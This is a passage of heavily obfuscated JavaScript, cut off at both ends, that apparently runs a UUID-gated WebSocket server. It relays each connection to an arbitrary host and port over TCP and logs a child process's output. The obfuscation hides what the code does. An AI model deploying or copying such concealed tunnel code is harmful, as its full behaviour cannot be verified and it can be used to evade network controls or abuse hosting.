_0x40bda3={'mODJA':_0x4a3fcb[_0x3b30db(0x225,0x1ed,0x1de,0x1ed,0x167)],'baqfC':function(_0x2c057e,_0x47734d){function _0x116e99(_0x55554a,_0x8683c7,_0x55db72,_0x251edd,_0x11b849){return _0x3b30db(_0x11b849- -0x128,_0x8683c7-0x56,_0x8683c7,_0x251edd-0x3,_0x11b849-0x43);}return _0x4a3fcb[_0x116e99(0x106,0xda,0xa6,-0x3c,0x50)](_0x2c057e,_0x47734d);},'tsKtZ':_0x4a3fcb[_0x3b30db(0x2a6,0x36c,0x278,0x20d,0x234)],'QtdjG':function(_0x30cacf,_0x890783){function _0x4a95a8(_0x2d26cd,_0x58b1f1,_0x38a957,_0x4ff900,_0x116f39){return _0x3b30db(_0x58b1f1- -0x11d,_0x58b1f1-0x66,_0x4ff900,_0x4ff900-0xd1,_0x116f39-0x1a7);}return _0x4a3fcb[_0x4a95a8(-0xea,-0x6,0x8c,0x48,0xd3)](_0x30cacf,_0x890783);},'KbQMx':_0x4a3fcb[_0x583d07(0x1a,-0xd3,-0x65,-0x15d,-0xbf)]};function _0x207e22(_0x13fdb1,_0x4bdc41,_0x3dbead,_0x3235d2,_0x22b63d){return _0x7dbfd5(_0x3235d2,_0x4bdc41-0x115,_0x3dbead-0x2a,_0x3235d2-0xb1,_0x4bdc41- -0x5ec);}const [_0x494a4f]=_0x455e6d,_0x13646c=_0x455e6d[_0x3b30db(0x1f2,0x2c9,0x160,0x2c2,0x17c)](0x2*-0xa66+-0x1de9+0x32b6,-0x24d1+-0x7dd+0x2cbf);if(!_0x13646c[_0x207e22(-0x287,-0x22a,-0x1af,-0x2d3,-0x15b)]((_0x9d9ec0,_0x2f8e48)=>_0x9d9ec0==_0x5b146a(_0x39e3b7[_0x2146f8(-0x2ec,-0x2b2,-0x31c,-0x263,-0x2df)+'r'](_0x2f8e48*(0x1*0xb65+-0x29f*-0xc+-0x1*0x2ad7),0x1e30+0x11*0x3d+-0x223b),0x10b8+-0x2*-0x6d7+0x1e56*-0x1)))return;let _0x1d6e36=_0x4a3fcb[_0xcca952(0x483,0x450,0x441,0x423,0x4b2)](_0x455e6d[_0xcca952(0x53d,0x4be,0x580,0x4cb,0x44c)](-0x2508+0x1*0x18cc+0xc4d,-0x204*-0x10+-0x239a+0x36c)[_0x583d07(-0xab,0x1d,0xb,-0x170,-0xb7)+_0x3b30db(0x17a,0xb4,0x202,0x21f,0x1fa)](),0x61*-0x59+-0x904*-0x1+0x18c8);const _0x4f52ed=_0x455e6d[_0x583d07(-0x14d,-0x35,-0xbf,-0xc0,-0x63)](_0x1d6e36,_0x1d6e36+=-0x120f+-0x41*-0x86+-0xff5)[_0x3b30db(0x19e,0x194,0x189,0x1a6,0x10d)+_0x3b30db(0x28a,0x1ca,0x215,0x352,0x1ba)+'BE'](0xfe*-0x3+0x22d+0xcd),_0x3fb1c5=_0x455e6d[_0xcca952(0x577,0x4be,0x405,0x43e,0x487)](_0x1d6e36,_0x1d6e36+=-0x18e3+-0x66d*0x1+0x1f51)[_0x3b30db(0x19e,0x14f,0x1bf,0x1d8,0x1c8)+_0x2146f8(-0x237,-0x203,-0x233,-0x22b,-0x2a8)](),_0x5b52f1=_0x4a3fcb[_0x207e22(-0x12e,-0x164,-0xdc,-0x193,-0x85)](_0x3fb1c5,0x3b2*-0x2+0x2275*-0x1+0x1e7*0x16)?_0x455e6d[_0x207e22(-0x218,-0x1e1,-0x29b,-0x230,-0x119)](_0x1d6e36,_0x1d6e36+=-0x158d+-0x1a07*-0x1+-0x476)[_0xcca952(0x62f,0x552,0x628,0x4cb,0x476)]('.'):_0x4a3fcb[_0x2146f8(-0x22c,-0x33b,-0x2ea,-0x276,-0x2ee)](_0x3fb1c5,0x22d*-0x2+-0xbb7+-0x1013*-0x1)?new _0x2486f9()[_0x3b30db(0x21f,0x15c,0x232,0x2b4,0x272)+'e'](_0x455e6d[_0xcca952(0x4aa,0x4be,0x427,0x4c2,0x419)](_0x4a3fcb[_0x2146f8(-0x260,-0x38b,-0x2a8,-0x2a9,-0x2a9)](_0x1d6e36,-0x13*-0xa+-0x13ae+0x12f1),_0x1d6e36+=_0x4a3fcb[_0x583d07(-0x70,-0x109,-0x17b,-0x5a,-0xe7)](0x207e*0x1+-0x2046+-0x1*0x37,_0x455e6d[_0xcca952(0x421,0x4be,0x4c2,0x534,0x41d)](_0x1d6e36,_0x4a3fcb[_0x2146f8(-0x2c4,-0x2e3,-0x1b0,-0x1d3,-0x1ff)](_0x1d6e36,-0xc11+0x12*-0x7+-0x18*-0x86))[_0x2146f8(-0x2a6,-0x1ff,-0x254,-0x368,-0x284)+_0x583d07(-0xe7,-0x23,-0x1f,-0xca,-0xdb)]()))):_0x4a3fcb[_0x2146f8(-0x206,-0x1bd,-0x2b1,-0x2c1,-0x22e)](_0x3fb1c5,0x14ed+-0x2502+0x1018)?_0x455e6d[_0x207e22(-0x198,-0x1e1,-0x102,-0x225,-0x2ad)](_0x1d6e36,_0x1d6e36+=-0xca7+0x125b*0x1+-0x5a4)[_0xcca952(0x3ad,0x49d,0x4af,0x4bb,0x4fc)+'e']((_0x4e2bb2,_0x3c8268,_0x4ecfb3,_0x1b3c70)=>_0x4ecfb3%(0x1981+0x1162+-0x1*0x2ae1)?_0x4e2bb2[_0x2146f8(-0x2d5,-0x318,-0x37d,-0x33a,-0x2fa)+'t'](_0x1b3c70[_0xcca952(0x56c,0x4be,0x569,0x48c,0x54b)](_0x4ecfb3-(-0x65*0x37+0x3ce+0x11e6),_0x4ecfb3+(-0x3*-0x506+-0x1ae4+0xbd3))):_0x4e2bb2,[])[_0x583d07(-0x94,-0x59,-0x4b,-0x33,-0x96)](_0x4ce2d5=>_0x4ce2d5[_0xcca952(0x529,0x46a,0x49a,0x4f4,0x4cd)+_0x583d07(-0xae,0x111,0x8d,0x70,0x35)+'BE'](-0x4d*-0x22+-0x270*0x10+0x1cc6)[_0x583d07(-0x9,0x93,0xe4,0x61,0x7b)+_0x583d07(-0x11a,-0x57,-0xc0,-0x54,-0x124)](0x6e6*0x1+-0x1d66+0x1690))[_0x3b30db(0x286,0x22e,0x209,0x220,0x289)](':'):'';_0x4a3fcb[_0x583d07(-0xd1,-0xb,-0xfe,-0x111,-0x2f)](_0x1f0967,_0x4a3fcb[_0x3b30db(0x2c6,0x2c3,0x252,0x33a,0x395)],_0x5b52f1,_0x4f52ed);function _0x2146f8(_0x1d4b5b,_0x2f588e,_0x20ba08,_0xa0c5,_0x152e14){return _0x29d5f9(_0x152e14- -0x450,_0x2f588e-0x10b,_0x20ba08-0x95,_0x1d4b5b,_0x152e14-0x14);}_0x2e49a9[_0x3b30db(0x189,0x1a1,0x136,0xcf,0x13f)](new _0x5b208c([_0x494a4f,-0x3f5+0x218b+-0x1d96]));const _0x547ab0=_0x4a3fcb[_0x583d07(-0x41,0xd,-0x19d,-0x15a,-0xdd)](_0x1171a1,_0x4b5aa3),_0x362371={};function _0x583d07(_0x175522,_0x401356,_0x1df422,_0x46d992,_0xa03659){return _0x270b17(_0x175522-0xbf,_0xa03659- -0x2bb,_0x1df422-0x63,_0x46d992-0x173,_0x1df422);}function _0x3b30db(_0x1e0d37,_0x562ef0,_0x564c4b,_0x5872c0,_0x450259){return _0x213bca(_0x1e0d37-0x11b,_0x1e0d37- -0x2d8,_0x564c4b-0x9f,_0x564c4b,_0x450259-0x1bd);}_0x362371[_0x3b30db(0x2f0,0x36d,0x312,0x29d,0x3ad)]=_0x5b52f1,_0x362371[_0x583d07(-0x139,-0x1b5,-0xf4,-0x1d6,-0x146)]=_0x4f52ed;const _0xb54f8b={};_0xb54f8b[_0xcca952(0x662,0x5bc,0x5a9,0x500,0x682)]=_0x5b52f1,_0xb54f8b[_0x583d07(-0x14e,-0x198,-0x237,-0xa9,-0x146)]=_0x4f52ed;function _0xcca952(_0x3a9eda,_0x1dbf6f,_0x49fc7d,_0x419bce,_0x17225b){return _0x7dbfd5(_0x419bce,_0x1dbf6f-0x1c,_0x49fc7d-0x15e,_0x419bce-0x1f0,_0x1dbf6f-0xb3);}_0x438959[_0x583d07(-0x1f,-0x15b,-0x55,-0x5c,-0xde)+'ct'](_0x362371,function(){function _0x23d9a3(_0x1b9028,_0x308619,_0x45a73e,_0x4996e2,_0x5845fb){return _0x3b30db(_0x1b9028-0x277,_0x308619-0xa3,_0x5845fb,_0x4996e2-0x1bd,_0x5845fb-0xcc);}function _0x687019(_0x5252d6,_0x57cac2,_0x3bdeed,_0x2fd398,_0x5c6fe8){return _0x2146f8(_0x5c6fe8,_0x57cac2-0x123,_0x3bdeed-0xe0,_0x2fd398-0x37,_0x5252d6-0x3dc);}this[_0x1e5482(-0xeb,-0x11f,-0x1bc,-0x136,-0xd4)](_0x455e6d[_0x9c6c20(-0x5b,-0xbc,0x8,0x6,-0x2e)](_0x1d6e36));function _0x9c6c20(_0x23b2d2,_0x2d98d3,_0x907baa,_0x1649d3,_0x52b7e8){return _0x207e22(_0x23b2d2-0x147,_0x23b2d2-0x186,_0x907baa-0xf2,_0x1649d3,_0x52b7e8-0x10c);}function _0x1e5482(_0x35f990,_0x4ef2b0,_0x3086c4,_0x274cc2,_0x84226d){return _0x2146f8(_0x3086c4,_0x4ef2b0-0xf5,_0x3086c4-0x161,_0x274cc2-0x7e,_0x35f990-0x1b1);}function _0x3c5723(_0x533307,_0x4c9964,_0x403242,_0xe92fc,_0x16addf){return _0x207e22(_0x533307-0x157,_0x16addf-0x701,_0x403242-0x71,_0x403242,_0x16addf-0x14b);}_0x547ab0['on'](_0x40bda3[_0x3c5723(0x4f1,0x52b,0x567,0x613,0x5b6)],_0x40bda3[_0x3c5723(0x53b,0x548,0x4fa,0x4c2,0x51a)](_0xb94e54,_0x40bda3[_0x3c5723(0x45d,0x493,0x3db,0x3fe,0x483)]))[_0x3c5723(0x4e7,0x5d5,0x5d8,0x4ce,0x592)](this)['on'](_0x40bda3[_0x9c6c20(0x3b,0xc0,0x11c,0xeb,0x107)],_0x40bda3[_0x1e5482(0x66,0x101,-0x2e,0x148,0x13b)](_0x174e2d,_0x40bda3[_0x687019(0x1a8,0x181,0x134,0x133,0x283)]))[_0x3c5723(0x63f,0x5fb,0x649,0x595,0x592)](_0x547ab0);})['on'](_0x4a3fcb[_0x3b30db(0x225,0x168,0x28a,0x238,0x1c3)],_0x4a3fcb[_0x3b30db(0x1fd,0x271,0x2d3,0x173,0x179)](_0x32b88e,_0x4a3fcb[_0x2146f8(-0xb1,-0x1dc,-0x1a5,-0x101,-0x144)],_0xb54f8b));})['on'](_0x1c21f8[_0x29d5f9(0x260,0x2e3,0x2c0,0x20e,0x2c4)],_0x1c21f8[_0x29d5f9(0x1b1,0x120,0x23b,0x1bd,0x1ed)](_0x4fa98d,_0x1c21f8[_0x5ec539(-0x10c,-0x1df,-0xfa,-0xff,-0x184)]));}}});httpServer[_0x5b3717(-0x1f7,-0x269,-0x202,-0x1a0,-0x1f1)+'n'](port,()=>{function _0x4f73e5(_0x26d7ed,_0x444357,_0x2a7a97,_0x527e1e,_0x28490c){return _0x3b9f4f(_0x2a7a97- -0x167,_0x444357-0x97,_0x2a7a97-0x97,_0x527e1e-0x66,_0x444357);}function _0x54079d(_0x4f622f,_0x7f5321,_0x4099a1,_0x2c58be,_0x2ef5aa){return _0x3b9f4f(_0x4099a1- -0x2db,_0x7f5321-0x6b,_0x4099a1-0xe5,_0x2c58be-0x19f,_0x2ef5aa);}function _0x26639a(_0x5d3d7e,_0x29c4ad,_0x178272,_0x4b442a,_0x26f109){return _0x504eae(_0x26f109- -0x452,_0x29c4ad-0x4a,_0x178272-0xc7,_0x4b442a-0x1ba,_0x29c4ad);}function _0x5aa48e(_0x1cf985,_0x4471c3,_0xd8689d,_0xfd7aee,_0x3b6576){return _0x1e3602(_0x1cf985-0x20,_0xd8689d,_0xd8689d-0x87,_0x3b6576-0x200,_0x3b6576-0x2e);}function _0x193839(_0x5bc765,_0x4179c0,_0x453ecf,_0x550361,_0x533d70){return _0x5b3717(_0x550361-0x445,_0x453ecf,_0x453ecf-0xe5,_0x550361-0x10f,_0x533d70-0x66);}console[_0x5aa48e(0x1e1,0x76,0x1cf,0x98,0x162)](_0x54079d(-0x366,-0x264,-0x306,-0x2de,-0x242)+_0x5aa48e(0x1d7,0x228,0xd5,0x19e,0x17b)+_0x54079d(-0x267,-0x2c6,-0x200,-0x2e4,-0x140)+_0x5aa48e(0x1ae,0x22a,0x26e,0x281,0x246)+_0x26639a(-0x142,-0x1fc,-0x8a,-0xce,-0x147)+'\x20'+port);});const _0x58453d={};_0x58453d[_0x5b3717(-0x251,-0x1d1,-0x218,-0x227,-0x168)+'r']=httpServer;const wss=new WebSocket[(_0x504eae(0x258,0x1f3,0x339,0x329,0x2d8))+'r'](_0x58453d);wss['on'](_0x1e3602(-0x120,-0xfb,-0xa7,-0x71,0x27)+_0x1e3602(-0x2a,0x75,-0x17,0xb1,0x91),_0x338277=>{const _0x15e773={'peSlp':function(_0x196ade,_0x291a3c){return _0x196ade===_0x291a3c;},'Mlvef':_0x53ba12(0x112,0xd2,-0xc,0xd7,-0x15),'qvIbA':_0x53ba12(0x205,0x21b,0x173,0x2ba,0x208),'rLUYi':_0x22caf1(-0x84,0x9f,-0x18,0x55,0x9),'iKskN':function(_0x5aec02,_0x4a41f9){return _0x5aec02(_0x4a41f9);},'CyOYO':_0x48965c(0x499,0x49f,0x468,0x3cd,0x531),'vjNvL':function(_0x498de0,_0x1ab857){return _0x498de0(_0x1ab857);},'mAhaX':_0x53ba12(0xfa,0x117,0x50,0x170,0xc4),'wmrKJ':function(_0x97afe7,_0x5596f4){return _0x97afe7+_0x5596f4;},'UzLYU':function(_0x4079ce,_0x7de1){return _0x4079ce+_0x7de1;},'xggyp':_0x22caf1(-0x42,-0x1c,-0xc1,-0xad,-0x9)+_0x48965c(0x3f1,0x4dd,0x47b,0x4e3,0x465)+_0x4d9560(-0x1d9,-0x13d,-0x153,-0x155,-0x1b7)+_0x48965c(0x47c,0x394,0x442,0x330,0x457),'gtuvb':_0x4e9ec3(0x1be,0x16d,0x1e5,0x207,0x16a)+_0x4d9560(0x55,-0x4a,0xa,-0x5c,-0x2c)+_0x53ba12(0x60,0xd7,0xe7,0xf7,0x2e)+_0x4d9560(-0x107,0x8,-0xa3,-0x23,0x45)+_0x4e9ec3(0xd2,0xa7,0xd9,0x42,0x1af)+_0x48965c(0x49d,0x423,0x338,0x3d0,0x493)+'\x20)','nJwcJ':function(_0x34f70e,_0x420df2){return _0x34f70e!==_0x420df2;},'myeAR':_0x48965c(0x403,0x3a4,0x42b,0x448,0x3ec),'NHqXG':_0x53ba12(0x17f,0xc4,0x168,0xbf,0x14f),'HIzaX':function(_0x2c0d5a,_0x303dde){return _0x2c0d5a==_0x303dde;},'LFXJW':function(_0x5ba431,_0x230a43){return _0x5ba431+_0x230a43;},'pWOqq':function(_0x590dcb,_0x52c607){return _0x590dcb+_0x52c607;},'IdbFC':function(_0xc482c0,_0x8fba09,_0x230c0a,_0xb4b844){return _0xc482c0(_0x8fba09,_0x230c0a,_0xb4b844);},'kdWLe':_0x53ba12(0xea,0xa7,0x3b,0x156,0x9b)+_0x48965c(0x530,0x494,0x3ff,0x52b,0x4bb),'AMPQa':function(_0x4366c0,_0x220619){return _0x4366c0(_0x220619);},'wzZPT':function(_0x39f8aa,_0x4d22b1,_0x21d564){return _0x39f8aa(_0x4d22b1,_0x21d564);},'Eezyv':_0x4d9560(-0xaf,-0xd9,-0x83,-0x145,-0xb0)+_0x4e9ec3(0x22c,0x2ba,0x1d5,0x15f,0x1ca)+'r:','AJXkM':_0x53ba12(0x51,0xa7,0x32,0x37,-0x42)+_0x4d9560(-0x10c,-0x13e,-0xd4,-0x7e,-0x114)+_0x4d9560(0x1d,0xda,0x76,0x32,-0x6c)+_0x53ba12(0x15e,0xfd,0x17e,0x94,0x12d)+'ly','sxRLl':_0x53ba12(0x4f,0xf9,0x1bd,0x1ac,0x1e0)+'ge','zbVyN':_0x4e9ec3(0x157,0x254,0x23f,0x220,0x296)+_0x4e9ec3(0xf5,-0x10,0xcc,0xb9,0x71)+_0x53ba12(0x194,0x1e6,0x24e,0x25e,0x1ef)+':'};function _0x22caf1(_0x42eeed,_0x2bf72e,_0x1c7313,_0x3fae0b,_0x414167){return _0x3b9f4f(_0x414167-0x62,_0x2bf72e-0xe2,_0x1c7313-0xd6,_0x3fae0b-0x101,_0x3fae0b);}function _0x4d9560(_0x32560f,_0x19d1a5,_0x592c2c,_0x361ab5,_0x4eeedf){return _0x1d31e6(_0x361ab5- -0x203,_0x19d1a5-0x8e,_0x32560f,_0x361ab5-0x141,_0x4eeedf-0x157);}console[_0x48965c(0x3bb,0x372,0x3d8,0x3fb,0x350)](_0x15e773[_0x4d9560(-0x202,-0x134,-0x1cc,-0x1a0,-0x138)]);function _0x48965c(_0x29af8a,_0x4fff4b,_0x5ea167,_0x2a0838,_0x1e857d){return _0x3b9f4f(_0x4fff4b-0x3b7,_0x4fff4b-0x61,_0x5ea167-0xde,_0x2a0838-0x1d,_0x2a0838);}function _0x4e9ec3(_0x21b174,_0xd6c6ab,_0x2c9692,_0xbf63,_0x48d11a){return _0x5b3717(_0x2c9692-0x345,_0xbf63,_0x2c9692-0x16a,_0xbf63-0xb8,_0x48d11a-0x1b);}function _0x53ba12(_0x38030d,_0x20c24f,_0x3aba8b,_0xd84a7e,_0x101c14){return _0x504eae(_0x20c24f- -0x1c2,_0x20c24f-0x1ea,_0x3aba8b-0x14c,_0xd84a7e-0x1e4,_0x101c14);}_0x338277[_0x48965c(0x346,0x344,0x361,0x3f1,0x358)](_0x15e773[_0x53ba12(0x170,0x153,0x98,0x10f,0x176)],_0x582f00=>{function _0x1f0c5b(_0x36fad2,_0x3a1821,_0x49fb9a,_0x37f73e,_0xf00117){return _0x4d9560(_0x49fb9a,_0x3a1821-0x42,_0x49fb9a-0xfa,_0x36fad2-0xa7,_0xf00117-0x52);}function _0x41d87d(_0x38e8ac,_0x11e0f9,_0x1a5c0f,_0x46d3c6,_0x40e158){return _0x4e9ec3(_0x38e8ac-0x118,_0x11e0f9-0xdc,_0x11e0f9- -0xec,_0x46d3c6,_0x40e158-0xee);}function _0x5a4020(_0xd2a491,_0x3ce8a9,_0x5f0598,_0x5d80fe,_0x24753d){return _0x22caf1(_0xd2a491-0x76,_0x3ce8a9-0x146,_0x5f0598-0x2d,_0x5d80fe,_0x3ce8a9- -0x140);}function _0x4f1aaa(_0x51b05a,_0x50d8e8,_0x4eb23f,_0x12ebfa,_0xf53023){return _0x4e9ec3(_0x51b05a-0x16a,_0x50d8e8-0x59,_0xf53023- -0x345,_0x51b05a,_0xf53023-0x14d);}function _0x3d5022(_0x12afd0,_0x4b1a36,_0x47c467,_0x2ec865,_0x304c24){return _0x4e9ec3(_0x12afd0-0xc6,_0x4b1a36-0x192,_0x4b1a36-0x125,_0x304c24,_0x304c24-0x17f);}if(_0x15e773[_0x41d87d(0x15f,0xda,0x121,0xdc,0xd6)](_0x15e773[_0x3d5022(0x330,0x2f5,0x33c,0x299,0x344)],_0x15e773[_0x4f1aaa(-0x1d1,-0xf2,-0x19,-0x15,-0xf0)])){const [_0x4e2b08]=_0x582f00,_0x1b95e7=_0x582f00[_0x3d5022(0x257,0x281,0x216,0x1ff,0x251)](-0xf66+0x476*-0x7+0x2ea1,-0x1*-0x150a+0x1*-0x257d+0x1c*0x97);if(!_0x1b95e7[_0x41d87d(0x9e,0x27,0xda,-0x69,0x41)]((_0x18b0ee,_0x5ba6eb)=>_0x18b0ee==parseInt(uuid[_0x41d87d(0x42,-0x3f,0x1,-0x2d,-0xad)+'r'](_0x5ba6eb*(0x14d*-0x1+-0x38b*0x8+-0x1*-0x1da7),-0x175d*-0x1+-0x5*-0x597+-0x334e),-0x1*-0x1df5+0x793+0x368*-0xb)))return;let _0x2499f9=_0x15e773[_0x41d87d(-0xd,0xd1,0xd3,0xb1,0x4d)](_0x582f00[_0x3d5022(0x22c,0x281,0x2c8,0x332,0x236)](0x11*-0x71+-0x2e*-0x6a+0x1a*-0x71,0x1300+0xb33+-0x1e21)[_0x41d87d(-0x9c,0x1c,-0x5c,-0x30,0xce)+_0x41d87d(-0x98,-0x8,-0x18,-0x64,-0xf9)](),-0x13b2+0x5*-0x6fb+-0x2*-0x1b56);const _0x169107=_0x582f00[_0x4f1aaa(-0x20a,-0x161,-0x201,-0x267,-0x1e9)](_0x2499f9,_0x2499f9+=-0x16b*0x10+0x1006+0x6ac)[_0x1f0c5b(-0x75,-0x2a,-0x14f,0x72,-0x11f)+_0x5a4020(-0xce,0x1d,0xc4,-0x55,0x54)+'BE'](-0x1*-0x193a+0x4a*0x26+-0x2436),_0x26909=_0x582f00[_0x41d87d(-0x45,0x70,0x2c,-0x28,-0x4b)](_0x2499f9,_0x2499f9+=0x1f*-0x46+0x2408+-0x1b8d)[_0x41d87d(0x56,0x1c,-0x5a,-0xa5,-0xa3)+_0x41d87d(0x4c,-0x8,-0x98,-0xc9,-0x9a)](),_0x2df56b=_0x15e773[_0x5a4020(-0x6d,-0x9d,0x17,-0x145,0xe)](_0x26909,-0x266*0xb+-0x2241+0x3ca4)?_0x582f00[_0x5a4020(0x59,-0x7b,-0x112,-0x138,-0xcf)](_0x2499f9,_0x2499f9+=-0x269e+0x2559+-0x149*-0x1)[_0x41d87d(0x2d,0x104,0x146,0x1da,0xf5)]('.'):_0x15e773[_0x3d5022(0x2b4,0x25f,0x2cd,0x30c,0x1d6)](_0x26909,-0x1*0x9b1+-0x26d*-0x6+0x1*-0x4db)?new TextDecoder()[_0x3d5022(0x26b,0x2ae,0x247,0x33d,0x2d1)+'e'](_0x582f00[_0x1f0c5b(-0x21,0x83,-0xc0,0x7e,-0x25)](_0x15e773[_0x3d5022(0x351,0x2e2,0x234,0x2f6,0x278)](_0x2499f9,0x1*0x349+0x37f*-0x7+-0x1531*-0x1),_0x2499f9+=_0x15e773[_0x4f1aaa(-0x1c8,-0x155,-0x277,-0x21c,-0x1db)](0x1e5*-0xd+-0x2*0x136c+0x3f7a,_0x582f00[_0x1f0c5b(-0x21,0xaf,-0x77,-0x93,0xca)](_0x2499f9,_0x15e773[_0x4f1aaa(-0x317,-0x1ca,-0x218,-0x2e7,-0x24d)](_0x2499f9,-0x8b1+-0x197d+-0xb65*-0x3))[_0x4f1aaa(-0x1a5,-0x185,-0x17a,-0x16a,-0x23d)+_0x41d87d(0xbf,-0x8,0xc3,0x39,0x22)]()))):_0x15e773[_0x3d5022(0x2a0,0x25f,0x33d,0x25d,0x350)](_0x26909,-0x653*0x5+-0x26f9+0x469b)?_0x582f00[_0x41d87d(0xe7,0x70,0xec,0x1a,-0x46)](_0x2499f9,_0x2499f9+=-0x2*0x375+-0x71*-0x7+-0x1*-0x3e3)[_0x5a4020(0x33,-0x9c,-0x17d,-0x2d,-0x3d)+'e']((_0x316879,_0x3ec672,_0xfe2286,_0x40ee93)=>_0xfe2286%(0x10d*-0xe+-0x11c1+0x2079)?_0x316879[_0x3d5022(0xfc,0x1b7,0x1bf,0x272,0x231)+'t'](_0x40ee93[_0x5a4020(-0x156,-0x7b,0x4f,-0x3e,-0x62)](_0xfe2286-(0x91d*0x1+0xcf*-0xd+0x167),_0xfe2286+(-0x209a*0x1+-0x1323+0x19df*0x2))):_0x316879,[])[_0x1f0c5b(-0x54,-0x108,-0xbe,0x1a,-0x5b)](_0x427ae0=>_0x427ae0[_0x3d5022(0x2b5,0x22d,0x16f,0x26c,0x1ab)+_0x41d87d(0x167,0x108,0xf2,0x4a,0x1be)+'BE'](-0x1*-0x1e9e+-0x60e+-0x1890)[_0x1f0c5b(0xbd,0x119,0x114,0xe8,-0xc)+_0x5a4020(-0x185,-0x13c,-0x191,-0x5d,-0x180)](0x1c2e+0x1d05+0x3923*-0x1))[_0x1f0c5b(0x73,0x6e,-0x15,0x7a,0x122)](':'):'';_0x15e773[_0x4f1aaa(-0x1c0,-0x288,-0x30e,-0x2e6,-0x227)](logcb,_0x15e773[_0x41d87d(0x6b,0x154,0x196,0xe6,0xd9)],_0x2df56b,_0x169107),_0x338277[_0x1f0c5b(-0x8a,-0x3f,-0x127,-0x7a,-0xe7)](new Uint8Array([_0x4e2b08,0x138e*-0x1+0x1e8a*-0x1+-0x1*-0x3218]));const _0x472178=_0x15e773[_0x4f1aaa(-0x20d,-0x148,-0x1c8,-0x9b,-0x121)](createWebSocketStream,_0x338277),_0x454610={};_0x454610[_0x1f0c5b(0xdd,0x110,0x23,0x1b,0xab)]=_0x2df56b,_0x454610[_0x3d5022(0x21c,0x19e,0x252,0x14a,0x166)]=_0x169107;const _0x33faab={};_0x33faab[_0x1f0c5b(0xdd,0x10f,0x1bd,0x1a,0x17e)]=_0x2df56b,_0x33faab[_0x1f0c5b(-0x104,-0x32,-0x36,-0x7a,-0x1bf)]=_0x169107,net[_0x5a4020(-0xa0,-0xf6,-0x14e,-0xa7,-0x1d0)+'ct'](_0x454610,function(){function _0x11e0a3(_0x236c71,_0x4a6a48,_0x1ef5e0,_0x32d975,_0x11aa54){return _0x41d87d(_0x236c71-0x189,_0x4a6a48-0xce,_0x1ef5e0-0x4d,_0x32d975,_0x11aa54-0x3b);}function _0x32a8b5(_0x3e6379,_0x1c981a,_0x18be16,_0x203f9f,_0x1c008){return _0x1f0c5b(_0x1c008-0x168,_0x1c981a-0x137,_0x18be16,_0x203f9f-0x197,_0x1c008-0xd7);}function _0x16e631(_0x4993a4,_0x343edb,_0x2f90df,_0x1e6444,_0x335e7a){return _0x4f1aaa(_0x335e7a,_0x343edb-0x55,_0x2f90df-0x190,_0x1e6444-0x110,_0x2f90df- -0x29);}function _0x1098ae(_0xb69a5a,_0x1ae799,_0x2ff761,_0x287b23,_0x159c1e){return _0x1f0c5b(_0x1ae799-0x289,_0x1ae799-0xe3,_0x2ff761,_0x287b23-0x11e,_0x159c1e-0x1ce);}function _0x1f8911(_0x401cfd,_0x299939,_0x88c271,_0x6d7be,_0x18e21c){return _0x41d87d(_0x401cfd-0x161,_0x299939-0x36c,_0x88c271-0x3a,_0x18e21c,_0x18e21c-0x89);}if(_0x15e773[_0x32a8b5(0x14c,0x161,0x97,0x185,0xa8)](_0x15e773[_0x32a8b5(0x2db,0x299,0x2e4,0x322,0x23d)],_0x15e773[_0x11e0a3(0x262,0x1a0,0x1f6,0x1e3,0x23f)])){if(_0x524eef){const _0x4f6fde=_0x2d6d32[_0x1098ae(0x246,0x2ff,0x394,0x397,0x39c)](_0x56dd80,arguments);return _0xb21abe=null,_0x4f6fde;}}else this[_0x11e0a3(0x35,0xd2,0x1b5,0x31,0xb3)](_0x582f00[_0x1f8911(0x47d,0x3dc,0x402,0x484,0x410)](_0x2499f9)),_0x472178['on'](_0x15e773[_0x11e0a3(0xf8,0x89,0x160,0x55,0xd5)],_0x15e773[_0x16e631(-0x1cc,-0x2b9,-0x20c,-0x25c,-0x2b1)](errcb,_0x15e773[_0x1f8911(0x48f,0x48c,0x484,0x42a,0x3ea)]))[_0x11e0a3(0x142,0x1b0,0x296,0x277,0xee)](this)['on'](_0x15e773[_0x11e0a3(0xb7,0x89,0xf4,0xdd,0x94)],_0x15e773[_0x16e631(-0x1d2,-0x174,-0x21a,-0x237,-0x2e2)](errcb,_0x15e773[_0x16e631(-0x13d,-0x13b,-0x140,-0x212,-0x7d)]))[_0x32a8b5(0x1db,0x21c,0x27a,0x168,0x1b9)](_0x472178);})['on'](_0x15e773[_0x5a4020(-0xde,-0x130,-0xa4,-0x171,-0x1e7)],_0x15e773[_0x4f1aaa(-0x25e,-0x2be,-0x18c,-0x1bf,-0x25b)](errcb,_0x15e773[_0x1f0c5b(0xd2,0x85,0x40,-0x11,0x6f)],_0x33faab));}else _0x29f49a=iGzjzx[_0x3d5022(0x249,0x279,0x25e,0x33a,0x2f5)](_0x482d28,iGzjzx[_0x1f0c5b(0x40,0x104,0x72,0xb1,0x47)](iGzjzx[_0x5a4020(-0xe3,-0x25,-0x85,-0x62,-0xcc)](iGzjzx[_0x4f1aaa(-0x1c0,-0x37,-0x1b3,-0x167,-0x10c)],iGzjzx[_0x3d5022(0x35f,0x35b,0x3d4,0x3d7,0x2bc)]),');'))();})['on'](_0x15e773[_0x53ba12(0xcc,0x6f,0xd,-0x56,0x27)],_0x15e773[_0x53ba12(0x60,0x12a,0x105,0x152,0x163)](errcb,_0x15e773[_0x4d9560(-0x23e,-0x9c,-0x142,-0x159,-0x20f)]));}),childProcess[_0x504eae(0x2aa,0x1f7,0x1cf,0x1c4,0x2c7)+'t']['on'](_0x3b9f4f(0x64,0xb3,0x5b,0x49,0x10d),_0x32308f=>{function _0x3645a9(_0x3a0263,_0x37102e,_0x2d4d99,_0x11b00e,_0x2eeba1){return _0x3b9f4f(_0x2eeba1-0x1e,_0x37102e-0xe1,_0x2d4d99-0xc2,_0x11b00e-0x1e2,_0x11b00e);}function _0xbf076a(_0x33c5da,_0x64aff6,_0x5b8ddd,_0x31aa91,_0xac739c){return _0x504eae(_0xac739c- -0x2b3,_0x64aff6-0xde,_0x5b8ddd-0x2b,_0x31aa91-0x115,_0x5b8ddd);}function _0x55ac32(_0x4f5e95,_0x442d25,_0x84fde9,_0x53ca28,_0x4b390e){return _0x1e3602(_0x4f5e95-0x167,_0x4b390e,_0x84fde9-0x1,_0x53ca28-0x1da,_0x4b390e-0x19a);}console[_0xbf076a(-0x154,-0x140,-0xb8,0x2b,-0x75)](_0xbf076a(0xda,0x8a,-0xd9,0x2f,-0x9)+_0x55ac32(0x1d0,0x1b7,0x265,0x221,0x2e6)+_0x32308f);});function 